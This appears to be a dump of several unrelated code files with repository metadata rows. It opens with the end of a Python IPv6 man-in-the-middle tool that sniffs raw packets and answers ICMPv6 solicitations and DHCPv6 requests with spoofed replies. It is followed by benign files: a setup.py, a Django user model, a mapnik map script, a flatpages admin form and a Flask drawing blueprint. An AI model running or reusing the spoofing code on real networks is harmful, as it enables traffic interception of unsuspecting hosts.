add_client_info_in_dictionary(client_mac_address,
{"advertise address": client_ipv6_address,
"dhcpv6 mitm": "success"},
client_already_in_dictionary)
Base.print_info("DHCPv6 Confirm from: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")",
" XID: ", hex(request['DHCPv6']['transaction-id']),
" IAA: ", client_ipv6_address)
Base.print_info("DHCPv6 Reply to: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")",
" XID: ", hex(request['DHCPv6']['transaction-id']),
" IAA: ", client_ipv6_address)
# endregion
# endregion
# # DHCPv6 Decline
# if request.haslayer(DHCP6_Decline):
# print Base.c_warning + "Sniff DHCPv6 Decline from: " + request[IPv6].src + " (" + \
# request[Ether].src + ") TID: " + hex(request[DHCP6_Decline].trid) + \
# " IAADDR: " + request[DHCP6OptIAAddress].addr
# # print request.summary
# endregion
# endregion
# region Main function
if __name__ == "__main__":
# region Send ICMPv6 advertise packets in other thread
tm.add_task(send_icmpv6_advertise_packets)
# endregion
# region Add multicast MAC addresses on interface
try:
Base.print_info("Get milticast MAC address on interface: ", current_network_interface)
mcast_addresses = sub.Popen(['ip maddress show ' + current_network_interface], shell=True, stdout=sub.PIPE)
out, err = mcast_addresses.communicate()
if icmpv6_router_solicitation_address not in out:
icmpv6_mcast_address = sub.Popen(['ip maddress add ' + icmpv6_router_solicitation_address +
' dev ' + current_network_interface], shell=True, stdout=sub.PIPE)
out, err = icmpv6_mcast_address.communicate()
if out == "":
Base.print_info("Add milticast MAC address: ", icmpv6_router_solicitation_address,
" on interface: ", current_network_interface)
else:
Base.print_error("Could not add milticast MAC address: ", icmpv6_router_solicitation_address,
" on interface: ", current_network_interface)
exit(1)
if dhcpv6_requests_address not in out:
dhcp6_mcast_address = sub.Popen(['ip maddress add ' + dhcpv6_requests_address +
' dev ' + current_network_interface], shell=True, stdout=sub.PIPE)
out, err = dhcp6_mcast_address.communicate()
if out == "":
Base.print_info("Add milticast MAC address: ", dhcpv6_requests_address,
" on interface: ", current_network_interface)
else:
Base.print_error("Could not add milticast MAC address: ", dhcpv6_requests_address,
" on interface: ", current_network_interface)
exit(1)
except OSError as e:
if e.errno == errno.ENOENT:
Base.print_error("Program: ", "ip", " is not installed!")
exit(1)
else:
Base.print_error("Something went wrong while trying to run ", "`ip`")
exit(2)
# endregion
# region Create RAW socket for sniffing
raw_socket = socket(AF_PACKET, SOCK_RAW, htons(0x0003))
# endregion
# region Print info message
Base.print_info("Waiting for a ICMPv6 or DHCPv6 requests ...")
# endregion
# region Start sniffing
while True:
# region Try
try:
# region Sniff packets from RAW socket
packets = raw_socket.recvfrom(2048)
for packet in packets:
# region Parse Ethernet header
ethernet_header = packet[:eth.header_length]
ethernet_header_dict = eth.parse_header(ethernet_header)
# endregion
# region Could not parse Ethernet header - break
if ethernet_header_dict is None:
break
# endregion
# region Ethernet filter
if target_mac_address is not None:
if ethernet_header_dict['source'] != target_mac_address:
break
else:
if ethernet_header_dict['source'] == your_mac_address:
break
# endregion
# region IPv6 packet
# 34525 - Type of IP packet (0x86dd)
if ethernet_header_dict['type'] != ipv6.header_type:
break
# region Parse IPv6 header
ipv6_header = packet[eth.header_length:eth.header_length + ipv6.header_length]
ipv6_header_dict = ipv6.parse_header(ipv6_header)
# endregion
# region Could not parse IPv6 header - break
if ipv6_header_dict is None:
break
# endregion
# region UDP
if ipv6_header_dict['next-header'] == udp.header_type:
# region Parse UDP header
udp_header_offset = eth.header_length + ipv6.header_length
udp_header = packet[udp_header_offset:udp_header_offset + udp.header_length]
udp_header_dict = udp.parse_header(udp_header)
# endregion
# region Could not parse UDP header - break
if udp_header_dict is None:
break
# endregion
# region DHCPv6 packet
if udp_header_dict['destination-port'] == 547 and udp_header_dict['source-port'] == 546:
# region Parse DHCPv6 request packet
dhcpv6_packet_offset = udp_header_offset + udp.header_length
dhcpv6_packet = packet[dhcpv6_packet_offset:]
dhcpv6_packet_dict = dhcpv6.parse_packet(dhcpv6_packet)
# endregion
# region Could not parse DHCPv6 request packet - break
if dhcpv6_packet_dict is None:
break
# endregion
# region Call function with full DHCPv6 packet
reply({
"Ethernet": ethernet_header_dict,
"IPv6": ipv6_header_dict,
"UDP": udp_header_dict,
"DHCPv6": dhcpv6_packet_dict
})
# endregion
# endregion
# endregion
# region ICMPv6
if ipv6_header_dict['next-header'] == icmpv6.packet_type:
# region Parse ICMPv6 packet
icmpv6_packet_offset = eth.header_length + ipv6.header_length
icmpv6_packet = packet[icmpv6_packet_offset:]
icmpv6_packet_dict = icmpv6.parse_packet(icmpv6_packet)
# endregion
# region Could not parse ICMPv6 packet - break
if icmpv6_packet_dict is None:
break
# endregion
# region ICMPv6 filter
                    if icmpv6_packet_dict['type'] in (133, 135):
pass
else:
break
# endregion
# region Call function with full ICMPv6 packet
reply({
"Ethernet": ethernet_header_dict,
"IPv6": ipv6_header_dict,
"ICMPv6": icmpv6_packet_dict
})
# endregion
# endregion
# endregion
# endregion
# endregion
# region Exception - KeyboardInterrupt
except KeyboardInterrupt:
Base.print_info("Exit")
exit(0)
# endregion
# endregion
# endregion
| unlicense | 7,659,077,770,600,407,000 | 43.846914 | 121 | 0.500248 | false |
JoshData/diff_match_patch-python | setup.py | 2 | 1307 | from setuptools import setup, find_packages, Extension
# Note to self: To upload a new version to PyPI, run:
# pip install wheel twine
# python setup.py sdist bdist_wheel
# twine upload dist/*
module1 = Extension('diff_match_patch',
sources = ['interface.cpp'],
include_dirs = [],
libraries = [])
setup(
name='diff_match_patch_python',
version='1.0.2',
description=u'A Python extension module that wraps Google\'s diff_match_patch C++ implementation for very fast string comparisons. Version 1.0.2 fixes a build issue on Macs.',
long_description=open("README.rst").read(),
author=u'Joshua Tauberer',
author_email=u'[email protected]',
url='https://github.com/JoshData/diff_match_patch-python',
packages=find_packages(),
license='CC0 (copyright waived)',
keywords="diff compare Google match patch diff_match_patch extension native C fast",
ext_modules=[module1],
classifiers=[
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
test_suite='tests',
)
| cc0-1.0 | -4,188,308,818,056,781,300 | 37.441176 | 179 | 0.636572 | false |
SeaItRise/SeaItRise-webportal | src/accounts/models.py | 1 | 4568 | import uuid
from datetime import timedelta
from django.conf import settings
from django.contrib.auth.models import AbstractBaseUser, BaseUserManager
from django.db import models
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
class MyUserManager(BaseUserManager):
def _create_user(self, email, password, first_name, last_name, is_staff, is_superuser, **extra_fields):
"""
        Create and save a User with the given email, password and name.
:param email: string
:param password: string
:param first_name: string
:param last_name: string
:param is_staff: boolean
:param is_superuser: boolean
:param extra_fields:
:return: User
"""
now = timezone.now()
email = self.normalize_email(email)
user = self.model(email=email,
first_name=first_name,
last_name=last_name,
is_staff=is_staff,
is_active=True,
is_superuser=is_superuser,
last_login=now,
date_joined=now, **extra_fields)
user.set_password(password)
user.save(using=self._db)
return user
def create_user(self, email, first_name, last_name, password, **extra_fields):
"""
        Create and save a User with the given email, password and name.
:param email: string
:param first_name: string
:param last_name: string
:param password: string
:param extra_fields:
:return: User
"""
return self._create_user(email, password, first_name, last_name, is_staff=False, is_superuser=False,
**extra_fields)
def create_superuser(self, email, first_name='', last_name='', password=None, **extra_fields):
"""
Create a super user.
:param email: string
:param first_name: string
:param last_name: string
:param password: string
:param extra_fields:
:return: User
"""
return self._create_user(email, password, first_name, last_name, is_staff=True, is_superuser=True,
**extra_fields)
class User(AbstractBaseUser):
"""
    Model that represents a user.
To be active, the user must register and confirm his email.
"""
GENDER_MALE = 'M'
GENDER_FEMALE = 'F'
GENDER_CHOICES = (
(GENDER_MALE, 'Male'),
(GENDER_FEMALE, 'Female')
)
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
first_name = models.CharField(_('First Name'), max_length=50)
last_name = models.CharField(_('Last Name'), max_length=50)
email = models.EmailField(_('Email address'), unique=True)
gender = models.CharField(max_length=1, choices=GENDER_CHOICES, default=GENDER_MALE)
confirmed_email = models.BooleanField(default=False)
is_staff = models.BooleanField(_('staff status'), default=False)
is_superuser = models.BooleanField(_('superuser status'), default=False)
is_active = models.BooleanField(_('active'), default=True)
date_joined = models.DateTimeField(_('date joined'), auto_now_add=True)
date_updated = models.DateTimeField(_('date updated'), auto_now=True)
activation_key = models.UUIDField(unique=True, default=uuid.uuid4) # email
USERNAME_FIELD = 'email'
objects = MyUserManager()
def __str__(self):
"""
        Unicode representation for a user model.
:return: string
"""
return self.email
def get_full_name(self):
"""
Return the first_name plus the last_name, with a space in between.
:return: string
"""
return "{0} {1}".format(self.first_name, self.last_name)
def get_short_name(self):
"""
Return the first_name.
:return: string
"""
return self.first_name
def activation_expired(self):
"""
Check if user's activation has expired.
:return: boolean
"""
return self.date_joined + timedelta(days=settings.ACCOUNT_ACTIVATION_DAYS) < timezone.now()
def confirm_email(self):
"""
Confirm email.
:return: boolean
"""
if not self.activation_expired() and not self.confirmed_email:
self.confirmed_email = True
self.save()
return True
return False
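# Illustrative usage of the custom manager (a sketch; the e-mail address, names
# and password below are placeholders):
#
#   user = User.objects.create_user(email='[email protected]', first_name='Jane',
#                                   last_name='Doe', password='s3cret')
#   user.confirm_email()  # True only while the activation window is still open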
| mit | -9,196,402,323,068,319,000 | 29.657718 | 108 | 0.59282 | false |
sbobovyc/Scalable-Warfare-Engine | src/utils/mapmaker/src/mapmaker.py | 1 | 7129 | """
Created on December 12, 2011
@author: sbobovyc
"""
"""
Copyright (C) 2011 Stanislav Bobovych
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import ctypes
import os
import sys
try:
import mapnik2
except:
print '\n\nThe mapnik library and python bindings must have been compiled and \
installed successfully before running this script.\n\n'
sys.exit(1)
def print_mapnik_plugins():
from mapnik2 import DatasourceCache as c; print ','.join(c.plugin_names())
def query_data():
from osgeo import gdal
ds = gdal.Open("../world_one_mapCLIPPED.tif", gdal.GA_ReadOnly)
width = ds.RasterXSize
height = ds.RasterYSize
proj = ds.GetProjection()
gt = ds.GetGeoTransform()
minx = gt[0]
miny = gt[3] + width*gt[4] + height*gt[5]
maxx = gt[0] + width*gt[1] + height*gt[2]
maxy = gt[3]
print width, height, proj, gt
print minx, miny, maxx, maxy
print "Affine transform"
#http://www.gdal.org/gdal_datamodel.html
#http://svn.osgeo.org/gdal/trunk/gdal/swig/python/samples/tolatlong.py
Xgeo = gt[0] + 0*gt[1] + 0*gt[2]
Ygeo = gt[3] + 0*gt[4] + 0*gt[5]
# Shift to the center of the pixel
Xgeo += gt[1] / 2.0
Ygeo += gt[5] / 2.0
print Ygeo, Xgeo
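# Illustrative helper distilled from the affine-transform snippet above (a sketch,
# not part of the original script); assumes a north-up image where gt[2] == gt[4] == 0.
def pixel_to_geo(gt, px, py):
    """Return georeferenced (x, y) for pixel/line (px, py), shifted to the pixel centre."""
    xgeo = gt[0] + px * gt[1] + py * gt[2] + gt[1] / 2.0
    ygeo = gt[3] + px * gt[4] + py * gt[5] + gt[5] / 2.0
    return xgeo, ygeo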
def create_testmap():
map_out = "map.png"
    mapnik = mapnik2  # only mapnik2 is imported in this module; alias it so the calls below resolve
    m = mapnik.Map(1024, 768)
style = mapnik.Style()
rule = mapnik.Rule()
rs = mapnik.RasterSymbolizer()
rule.symbols.append(rs)
style.rules.append(rule)
m.append_style('raster',style)
lyr = mapnik.Layer('raster')
lyr.datasource = mapnik.Gdal(base='..', file="world_one_mapCLIPPED.tif")
lyr.styles.append('raster')
m.layers.append(lyr)
symbolizer = mapnik.PolygonSymbolizer(mapnik.Color(255, 0, 0))
symbolizer.fill_opacity = 0.5
symbolizer.gamma = 0.0
rule.symbols.append(symbolizer)
style2 = mapnik.Style()
style2.rules.append(rule)
layer2 = mapnik.Layer("mapLayer")
layer2.datasource = mapnik.Shapefile(file="../border.shp")
layer2.styles.append("mapStyle")
m.background = mapnik.Color("steelblue")
m.append_style("mapStyle", style2)
m.layers.append(layer2)
m.zoom_all()
mapnik.render_to_file(m, map_out, 'png')
def create_testmap_db():
map_out = "map_from_db.png"
m = mapnik2.Map(1024, 768)
style = mapnik2.Style()
rule = mapnik2.Rule()
rs = mapnik2.RasterSymbolizer()
rule.symbols.append(rs)
style.rules.append(rule)
m.append_style('raster',style)
lyr = mapnik2.Layer('raster')
lyr.datasource = mapnik2.Gdal(base='..', file="world_one_mapCLIPPED.tif")
lyr.styles.append('raster')
m.layers.append(lyr)
symbolizer = mapnik2.PolygonSymbolizer(mapnik2.Color(255, 0, 0))
symbolizer.fill_opacity = 0.5
symbolizer.gamma = 0.0
rule.symbols.append(symbolizer)
style2 = mapnik2.Style()
style2.rules.append(rule)
layer2 = mapnik2.Layer("mapLayer")
layer2.datasource = mapnik2.SQLite(file="../border.sqlite", table='border', key_field='OGC_FID', geometry_field='GEOMETRY', wkb_format='spatialite', extent='-64.5721,31.0319,-4.50204,61.8924')
layer2.styles.append("mapStyle")
m.background = mapnik2.Color("steelblue")
m.append_style("mapStyle", style2)
m.layers.append(layer2)
m.zoom_all()
mapnik2.render_to_file(m, map_out, 'png')
def create_testmap_region_filter():
map_out = "map_from_db.png"
m = mapnik2.Map(1024, 768)
style = mapnik2.Style()
rule = mapnik2.Rule()
rs = mapnik2.RasterSymbolizer()
rule.symbols.append(rs)
style.rules.append(rule)
lyr = mapnik2.Layer('raster')
lyr.datasource = mapnik2.Gdal(base='..', file="world_one_mapCLIPPED.tif")
lyr.styles.append('raster')
m.append_style('raster',style)
m.layers.append(lyr)
symbolizer = mapnik2.PolygonSymbolizer(mapnik2.Color(255, 0, 0))
symbolizer.fill_opacity = 0.5
symbolizer.gamma = 0.0
rule.symbols.append(symbolizer)
style2 = mapnik2.Style()
style2.rules.append(rule)
layer2 = mapnik2.Layer("notSelected")
layer2.datasource = mapnik2.SQLite(file="../border.sqlite", table='(SELECT * from border WHERE Name IS NOT "Pi") as notSelected', key_field='OGC_FID', geometry_field='GEOMETRY', wkb_format='spatialite', extent='-64.5721,31.0319,-4.50204,61.8924')
layer2.styles.append("unselectedStyle")
symbolizer2 = mapnik2.PolygonSymbolizer(mapnik2.Color(0, 125, 125))
symbolizer2.fill_opacity = 0.5
symbolizer2.gamma = 0.0
rule.symbols.append(symbolizer2)
style3 = mapnik2.Style()
style3.rules.append(rule)
layer3 = mapnik2.Layer("selected")
layer3.datasource = mapnik2.SQLite(file="../border.sqlite", table='(SELECT * from border WHERE Name IS "Pi") as notSelected', key_field='OGC_FID', geometry_field='GEOMETRY', wkb_format='spatialite', extent='-64.5721,31.0319,-4.50204,61.8924')
layer3.styles.append("selectedStyle")
m.background = mapnik2.Color("steelblue")
m.append_style("unselectedStyle", style2)
m.append_style("selectedStyle", style3)
m.layers.append(layer2)
m.layers.append(layer3)
m.zoom_all()
mapnik2.render_to_file(m, map_out, 'png')
def create_testmap_db_point():
map_out = "map_pi.png"
m = mapnik2.Map(1024, 768)
style = mapnik2.Style()
rule = mapnik2.Rule()
rs = mapnik2.RasterSymbolizer()
rule.symbols.append(rs)
style.rules.append(rule)
m.append_style('raster',style)
lyr = mapnik2.Layer('raster')
lyr.datasource = mapnik2.Gdal(base='..', file="world_one_mapCLIPPED.tif")
lyr.styles.append('raster')
m.layers.append(lyr)
symbolizer = mapnik2.PointSymbolizer(mapnik2.PathExpression("draw_circle.png"))
symbolizer.allow_overlap = True
symbolizer.fill_opacity = 0.5
symbolizer.gamma = 0.0
rule.symbols.append(symbolizer)
style2 = mapnik2.Style()
style2.rules.append(rule)
layer2 = mapnik2.Layer("mapLayer")
layer2.datasource = mapnik2.SQLite(file="../test-2.3.sqlite", table='(SELECT * FROM Towns WHERE Peoples < 500) as data', key_field='PK_UID', geometry_field='GEOMETRY', wkb_format='spatialite', extent="319224,3934670,1308590,5214370")
print layer2.datasource.describe()
layer2.styles.append("mapStyle")
m.background = mapnik2.Color("red")
m.append_style("mapStyle", style2)
m.layers.append(layer2)
m.zoom_all()
mapnik2.render_to_file(m, map_out, 'png')
if __name__ == '__main__':
print_mapnik_plugins()
#create_testmap_db()
#create_testmap_db_region()
#create_testmap_region_filter()
query_data()
| gpl-3.0 | 2,024,511,455,187,752,400 | 33.274038 | 250 | 0.675971 | false |
greggian/TapdIn | django/contrib/flatpages/admin.py | 1 | 1100 | from django import forms
from django.contrib import admin
from django.contrib.flatpages.models import FlatPage
from django.utils.translation import ugettext_lazy as _
class FlatpageForm(forms.ModelForm):
url = forms.RegexField(label=_("URL"), max_length=100, regex=r'^[-\w/]+$',
help_text = _("Example: '/about/contact/'. Make sure to have leading"
" and trailing slashes."),
error_message = _("This value must contain only letters, numbers,"
" underscores, dashes or slashes."))
class Meta:
model = FlatPage
class FlatPageAdmin(admin.ModelAdmin):
form = FlatpageForm
fieldsets = (
(None, {'fields': ('url', 'title', 'content', 'sites')}),
(_('Advanced options'), {'classes': ('collapse',), 'fields': ('enable_comments', 'registration_required', 'template_name')}),
)
list_display = ('url', 'title')
list_filter = ('sites', 'enable_comments', 'registration_required')
search_fields = ('url', 'title')
admin.site.register(FlatPage, FlatPageAdmin)
| apache-2.0 | 7,297,535,413,985,754,000 | 37.285714 | 133 | 0.615455 | false |
2015fallhw/cdw11 | users/b/g11/bg11_40323247.py | 1 | 20505 | # Each group builds its application in its own .py file (step 1 of 3)
from flask import Blueprint, render_template, make_response
# Use Blueprint to create ag1, with url prefix /ag1, and set the template folder
bg11_40323247 = Blueprint('bg11_40323247', __name__, url_prefix='/bg11_40323247', template_folder='templates')
@bg11_40323247.route('/task47_1')
def task47_1():
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>網際 2D 繪圖</title>
<!-- IE 9: display inline SVG -->
<meta http-equiv="X-UA-Compatible" content="IE=9">
<script type="text/javascript" src="http://brython.info/src/brython_dist.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/Cango-8v03.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/Cango2D-6v13.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/CangoAxes-1v33.js"></script>
</head>
<body>
<script>
window.onload=function(){
brython(1);
}
</script>
<canvas id="plotarea" width="800" height="800"></canvas>
<script type="text/python">
from javascript import JSConstructor
from browser import alert
from browser import window
import math
cango = JSConstructor(window.Cango)
cobj = JSConstructor(window.Cobj)
shapedefs = window.shapeDefs
obj2d = JSConstructor(window.Obj2D)
cgo = cango("plotarea")
cgo.setWorldCoords(-250, -250, 500, 500)
# 畫軸線
cgo.drawAxes(0, 240, 0, 240, {
"strokeColor":"#aaaaaa",
"fillColor": "#aaaaaa",
"xTickInterval": 20,
"xLabelInterval": 20,
"yTickInterval": 20,
"yLabelInterval": 20})
deg = math.pi/180
class chain():
# 輪廓的外型設為成員變數
chamber = "M -6.8397, -1.4894 \
A 7, 7, 0, 1, 0, 6.8397, -1.4894 \
A 40, 40, 0, 0, 1, 6.8397, -18.511 \
A 7, 7, 0, 1, 0, -6.8397, -18.511 \
A 40, 40, 0, 0, 1, -6.8397, -1.4894 z"
cgoChamber = window.svgToCgoSVG(chamber)
# 利用鏈條起點與終點定義繪圖, 使用內定的 color, border 與 linewidth 變數
def basic(self, x1, y1, x2, y2, color="green", border=True, linewidth=4, scale=1):
self.x1 = x1
self.y1 = y1
self.x2 = x2
self.y2 = y2
self.color = color
self.border = border
self.linewidth = linewidth
self.scale = scale
# 注意, cgo.Chamber 為成員變數
cmbr = cobj(self.cgoChamber, "SHAPE", {
"fillColor": color,
"border": border,
"strokeColor": "tan",
"lineWidth": linewidth })
# hole 為原點位置
hole = cobj(shapedefs.circle(4), "PATH")
cmbr.appendPath(hole)
# 複製 cmbr, 然後命名為 basic1
basic1 = cmbr.dup()
# 因為鏈條的角度由原點向下垂直, 所以必須轉 90 度, 再考量 atan2 的轉角
basic1.rotate(math.atan2(y2-y1, x2-x1)/deg+90)
# 放大 scale 倍
cgo.render(basic1, x1, y1, scale, 0)
# 利用鏈條起點與旋轉角度定義繪圖, 使用內定的 color, border 與 linewidth 變數
def basic_rot(self, x1, y1, rot, color="green", border=True, linewidth=4, scale=1):
self.x1 = x1
self.y1 = y1
self.rot = rot
self.color = color
self.border = border
self.linewidth = linewidth
self.scale = scale
# 注意, cgo.Chamber 為成員變數
cmbr = cobj(self.cgoChamber, "SHAPE", {
"fillColor": color,
"border": border,
"strokeColor": "tan",
"lineWidth": linewidth })
# hole 為原點位置
hole = cobj(shapedefs.circle(4), "PATH")
cmbr.appendPath(hole)
# 根據旋轉角度, 計算 x2 與 y2
x2 = x1 + 20*math.cos(rot*deg)
y2 = y1 + 20*math.sin(rot*deg)
# 複製 cmbr, 然後命名為 basic1
basic1 = cmbr.dup()
# 因為鏈條的角度由原點向下垂直, 所以必須轉 90 度, 再考量 atan2 的轉角
basic1.rotate(rot+90)
# 放大 scale 倍
cgo.render(basic1, x1, y1, scale, 0)
return x2, y2
# 利用 chain class 建立案例, 對應到 mychain 變數
mychain = chain()
# 畫 A
# 左邊兩個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
# 左斜邊兩個單元
x3, y3 = mychain.basic_rot(x2, y2, 80)
x4, y4 = mychain.basic_rot(x3, y3, 71)
# 最上方水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜邊兩個單元
x6, y6 = mychain.basic_rot(x5, y5, -71)
x7, y7 = mychain.basic_rot(x6, y6, -80)
# 右邊兩個垂直單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
x9, y9 = mychain.basic_rot(x8, y8, -90)
# 中間兩個水平單元
x10, y10 = mychain.basic_rot(x8, y8, -180)
mychain.basic(x10, y10, x1, y1, color="green")
cgo.setWorldCoords(-315, -250, 500, 500)
# 畫 A
# 左邊兩個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
# 左斜邊兩個單元
x3, y3 = mychain.basic_rot(x2, y2, 80)
x4, y4 = mychain.basic_rot(x3, y3, 71)
# 最上方水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜邊兩個單元
x6, y6 = mychain.basic_rot(x5, y5, -71)
x7, y7 = mychain.basic_rot(x6, y6, -80)
# 右邊兩個垂直單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
x9, y9 = mychain.basic_rot(x8, y8, -90)
# 中間兩個水平單元
x10, y10 = mychain.basic_rot(x8, y8, -180)
mychain.basic(x10, y10, x1, y1, color="blue")
cgo.setWorldCoords(-385, -250, 500, 500)
# 畫 A
# 左邊兩個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
# 左斜邊兩個單元
x3, y3 = mychain.basic_rot(x2, y2, 80)
x4, y4 = mychain.basic_rot(x3, y3, 71)
# 最上方水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜邊兩個單元
x6, y6 = mychain.basic_rot(x5, y5, -71)
x7, y7 = mychain.basic_rot(x6, y6, -80)
# 右邊兩個垂直單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
x9, y9 = mychain.basic_rot(x8, y8, -90)
# 中間兩個水平單元
x10, y10 = mychain.basic_rot(x8, y8, -180)
mychain.basic(x10, y10, x1, y1, color="red")
cgo.setWorldCoords(-445, -250, 500, 500)
# 畫 A
# 左邊兩個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
# 左斜邊兩個單元
x3, y3 = mychain.basic_rot(x2, y2, 80)
x4, y4 = mychain.basic_rot(x3, y3, 71)
# 最上方水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜邊兩個單元
x6, y6 = mychain.basic_rot(x5, y5, -71)
x7, y7 = mychain.basic_rot(x6, y6, -80)
# 右邊兩個垂直單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
x9, y9 = mychain.basic_rot(x8, y8, -90)
# 中間兩個水平單元
x10, y10 = mychain.basic_rot(x8, y8, -180)
mychain.basic(x10, y10, x1, y1, color="green")
</script>
</body></html>
'''
return outstring
@bg11_40323247.route('/task47_2')
def task47_2():
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>網際 2D 繪圖</title>
<!-- IE 9: display inline SVG -->
<meta http-equiv="X-UA-Compatible" content="IE=9">
<script type="text/javascript" src="http://brython.info/src/brython_dist.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/Cango-8v03.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/Cango2D-6v13.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/CangoAxes-1v33.js"></script>
</head>
<body>
<script>
window.onload=function(){
brython(1);
}
</script>
<canvas id="plotarea" width="800" height="800"></canvas>
<script type="text/python">
from javascript import JSConstructor
from browser import alert
from browser import window
import math
cango = JSConstructor(window.Cango)
cobj = JSConstructor(window.Cobj)
shapedefs = window.shapeDefs
obj2d = JSConstructor(window.Obj2D)
cgo = cango("plotarea")
cgo.setWorldCoords(-40, -250, 500, 500)
# 畫軸線
cgo.drawAxes(0, 240, 0, 240, {
"strokeColor":"#aaaaaa",
"fillColor": "#aaaaaa",
"xTickInterval": 20,
"xLabelInterval": 20,
"yTickInterval": 20,
"yLabelInterval": 20})
deg = math.pi/180
class chain():
# 輪廓的外型設為成員變數
chamber = "M -6.8397, -1.4894 \
A 7, 7, 0, 1, 0, 6.8397, -1.4894 \
A 40, 40, 0, 0, 1, 6.8397, -18.511 \
A 7, 7, 0, 1, 0, -6.8397, -18.511 \
A 40, 40, 0, 0, 1, -6.8397, -1.4894 z"
cgoChamber = window.svgToCgoSVG(chamber)
# 利用鏈條起點與終點定義繪圖, 使用內定的 color, border 與 linewidth 變數
def basic(self, x1, y1, x2, y2, color="green", border=True, linewidth=4, scale=1):
self.x1 = x1
self.y1 = y1
self.x2 = x2
self.y2 = y2
self.color = color
self.border = border
self.linewidth = linewidth
self.scale = scale
# 注意, cgo.Chamber 為成員變數
cmbr = cobj(self.cgoChamber, "SHAPE", {
"fillColor": color,
"border": border,
"strokeColor": "tan",
"lineWidth": linewidth })
# hole 為原點位置
hole = cobj(shapedefs.circle(4), "PATH")
cmbr.appendPath(hole)
# 複製 cmbr, 然後命名為 basic1
basic1 = cmbr.dup()
# 因為鏈條的角度由原點向下垂直, 所以必須轉 90 度, 再考量 atan2 的轉角
basic1.rotate(math.atan2(y2-y1, x2-x1)/deg+90)
# 放大 scale 倍
cgo.render(basic1, x1, y1, scale, 0)
# 利用鏈條起點與旋轉角度定義繪圖, 使用內定的 color, border 與 linewidth 變數
def basic_rot(self, x1, y1, rot, color="green", border=True, linewidth=4, scale=1):
self.x1 = x1
self.y1 = y1
self.rot = rot
self.color = color
self.border = border
self.linewidth = linewidth
self.scale = scale
# 注意, cgo.Chamber 為成員變數
cmbr = cobj(self.cgoChamber, "SHAPE", {
"fillColor": color,
"border": border,
"strokeColor": "tan",
"lineWidth": linewidth })
# hole 為原點位置
hole = cobj(shapedefs.circle(4), "PATH")
cmbr.appendPath(hole)
# 根據旋轉角度, 計算 x2 與 y2
x2 = x1 + 20*math.cos(rot*deg)
y2 = y1 + 20*math.sin(rot*deg)
# 複製 cmbr, 然後命名為 basic1
basic1 = cmbr.dup()
# 因為鏈條的角度由原點向下垂直, 所以必須轉 90 度, 再考量 atan2 的轉角
basic1.rotate(rot+90)
# 放大 scale 倍
cgo.render(basic1, x1, y1, scale, 0)
return x2, y2
# 利用 chain class 建立案例, 對應到 mychain 變數
mychain = chain()
# 畫 B
# 左邊四個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
x3, y3 = mychain.basic_rot(x2, y2, 90)
x4, y4 = mychain.basic_rot(x3, y3, 90)
# 上方一個水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜 -30 度
x6, y6 = mychain.basic_rot(x5, y5, -30)
# 右上垂直向下單元
x7, y7 = mychain.basic_rot(x6, y6, -90)
# 右斜 240 度
x8, y8 = mychain.basic_rot(x7, y7, 210)
# 中間水平
mychain.basic(x8, y8, x2, y2)
# 右下斜 -30 度
x10, y10 = mychain.basic_rot(x8, y8, -30)
# 右下垂直向下單元
x11, y11 = mychain.basic_rot(x10, y10, -90)
# 右下斜 240 度
x12, y12 = mychain.basic_rot(x11, y11, 210)
# 水平接回起點
mychain.basic(x12,y12, 0, 0, color="green")
cgo.setWorldCoords(-107.5, -250, 500, 500)
# 畫 A
# 左邊兩個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
# 左斜邊兩個單元
x3, y3 = mychain.basic_rot(x2, y2, 80)
x4, y4 = mychain.basic_rot(x3, y3, 71)
# 最上方水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜邊兩個單元
x6, y6 = mychain.basic_rot(x5, y5, -71)
x7, y7 = mychain.basic_rot(x6, y6, -80)
# 右邊兩個垂直單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
